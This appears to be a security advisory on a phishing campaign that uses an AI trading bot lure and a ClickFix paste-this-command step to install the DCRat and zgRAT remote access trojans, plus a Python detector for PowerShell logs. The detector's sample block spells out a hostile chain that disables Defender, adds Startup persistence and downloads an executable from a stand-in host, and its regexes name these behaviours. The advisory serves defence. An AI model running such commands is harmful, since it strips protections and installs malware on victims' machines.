AI Trading Bot Lure (RATs)
A campaign was observed that uses an AI Trading Bot lure. The message makes several claims about the use of machine learning and real-time market analysis to gain a trading advantage. Instead, this phishing attempt installs two remote access trojans (RATs), Dark Crystal RAT (DCRat) and zgRAT. RATs provide threat actors with full remote access to a victim’s computer, enabling them to capture sensitive information, including passwords, screenshots, clipboard content, cookies, and other personal data.
The message includes URLs that direct users to a landing page promising a trial with no credit card required. If a user clicks the “Get started for free” button, an overlay using the ClickFix technique appears, instructing the user to copy and paste a command. If the user does so, a PowerShell command executes. The script disables real-time monitoring services such as Windows Defender, suppresses error messages to hide malicious activity, establishes persistence by creating a shortcut in the user’s Startup folder, and downloads and installs DCRat and zgRAT.
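As an added example (not part of the original campaign report), the Python below scores PowerShell script-block text against the four behaviours described above and flags a block when two or more co-occur; it assumes script-block text is already available as strings (for example from PowerShell script block logging, event ID 4104), and the sample blocks, pattern names and threshold are constructed for illustration.

```python
import re

# One heuristic per behaviour in the chain described above. These match
# behaviours, not a specific payload, so they also apply to variants.
INDICATORS = {
    # disabling Defender real-time monitoring via Set-MpPreference
    "defender_tamper": re.compile(r"Set-MpPreference\s+-Disable\w*Monitoring", re.I),
    # silencing errors so failures do not alert the user
    "error_silencing": re.compile(r"ErrorActionPreference\s*=\s*['\"]?SilentlyContinue", re.I),
    # writing into the per-user Startup folder for persistence
    "startup_persistence": re.compile(
        r"Start Menu\\Programs\\Startup|GetFolderPath\(\s*['\"]Startup['\"]", re.I),
    # common PowerShell download cradles
    "download_cradle": re.compile(
        r"\b(Invoke-WebRequest|iwr|DownloadFile|DownloadString|Start-BitsTransfer)\b", re.I),
}

SUSPICIOUS_THRESHOLD = 2  # constructed: single hits are common in benign admin scripts


def score_script_block(text: str) -> dict:
    """Return which indicators fire on one script block and whether it is suspicious."""
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(text)]
    return {"hits": hits, "score": len(hits), "suspicious": len(hits) >= SUSPICIOUS_THRESHOLD}


def triage(blocks: list[str]) -> list[dict]:
    """Score every block and return only the suspicious ones, highest score first."""
    scored = [dict(score_script_block(b), text=b) for b in blocks]
    return sorted((s for s in scored if s["suspicious"]), key=lambda s: -s["score"])


# Constructed sample blocks (not real payloads): one mirrors the described chain,
# two are benign administrative activity that a single-indicator rule would flag.
SAMPLE_BLOCKS = [
    "$ErrorActionPreference='SilentlyContinue'; Set-MpPreference -DisableRealtimeMonitoring $true; "
    "$lnk=\"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\upd.lnk\"; "
    "Invoke-WebRequest 'http://example.invalid/x' -OutFile \"$env:TEMP\\x.exe\"",
    "Get-MpPreference | Select-Object DisableRealtimeMonitoring",
    "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_BLOCKS):
        print(finding["score"], finding["hits"])
```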